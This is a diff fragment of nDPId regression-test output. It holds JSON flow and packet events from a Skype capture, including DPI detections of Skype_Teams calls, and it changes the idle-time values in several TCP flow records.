+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgx0AAEARe8zAqAEib91KHDLdnFoALOnqe1MCA8GYjWWu9fDS5z8O1HnUzLtilbW9STWNzZ4dxAZIYogR"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -504,28 +504,28 @@ 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00192{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370} 00417{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZOhAAEAGVprAqAEib91Njsg4nE30S7v3AAAAALAC\/\/9gmwAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAp19AAEAGSKzAqAEinTfrqsg5nGDRQCL5AAAAALAC\/\/9RGgAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZOhAAEAGVprAqAEib91Njsg4nE30S7v3AAAAALAC\/\/9gmwAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAp19AAEAGSKzAqAEinTfrqsg5nGDRQCL5AAAAALAC\/\/9RGgAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fE8AAEARfyTAqAEib91NlTLdnFAAKVN0e20CYiNLpCtZKVRm5qzsJsm2qgqqm\/VHJHAXu9AEnz3Z"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7vtoAAEARQB3AqAEib91KEzLdnEEAJxFYe28CrL8oxTm2+6Ol0c4xcn\/aCmr6scDIaqNamEoS7g=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431970666974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0VXBAAEAGmqfAqAEinTfrqsg5nGDRQCL6GayyHIAQECz4ZQAAAQEICj4yBHZMVm\/i"} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1431970667029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667029,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIpxFyDfIYnGx6BtHvqASOJAYmAAAAgQFrAQCCApOwLWvPjIEMAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1431970667029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667029,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ekBAAEAG3vPAqAEinTeCjsg3nEXoG0e+yGJxsoAQECxvRgAAAQEICj4yBKxOwLWv"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1431970667195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxNyDjFFwvv9Eu7+KASOJAFzgAAAgQFrAQCCApNkBSePjIEMAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431970666974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0VXBAAEAGmqfAqAEinTfrqsg5nGDRQCL6GayyHIAQECz4ZQAAAQEICj4yBHZMVm\/i"} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1431970667029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667029,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiydN4KOwKgBIpxFyDfIYnGx6BtHvqASOJAYmAAAAgQFrAQCCApOwLWvPjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1431970667029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667029,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ekBAAEAG3vPAqAEinTeCjsg3nEXoG0e+yGJxsoAQECxvRgAAAQEICj4yBKxOwLWv"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1431970667195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970667195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxNyDjFFwvv9Eu7+KASOJAFzgAAAgQFrAQCCApNkBSePjIEMAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 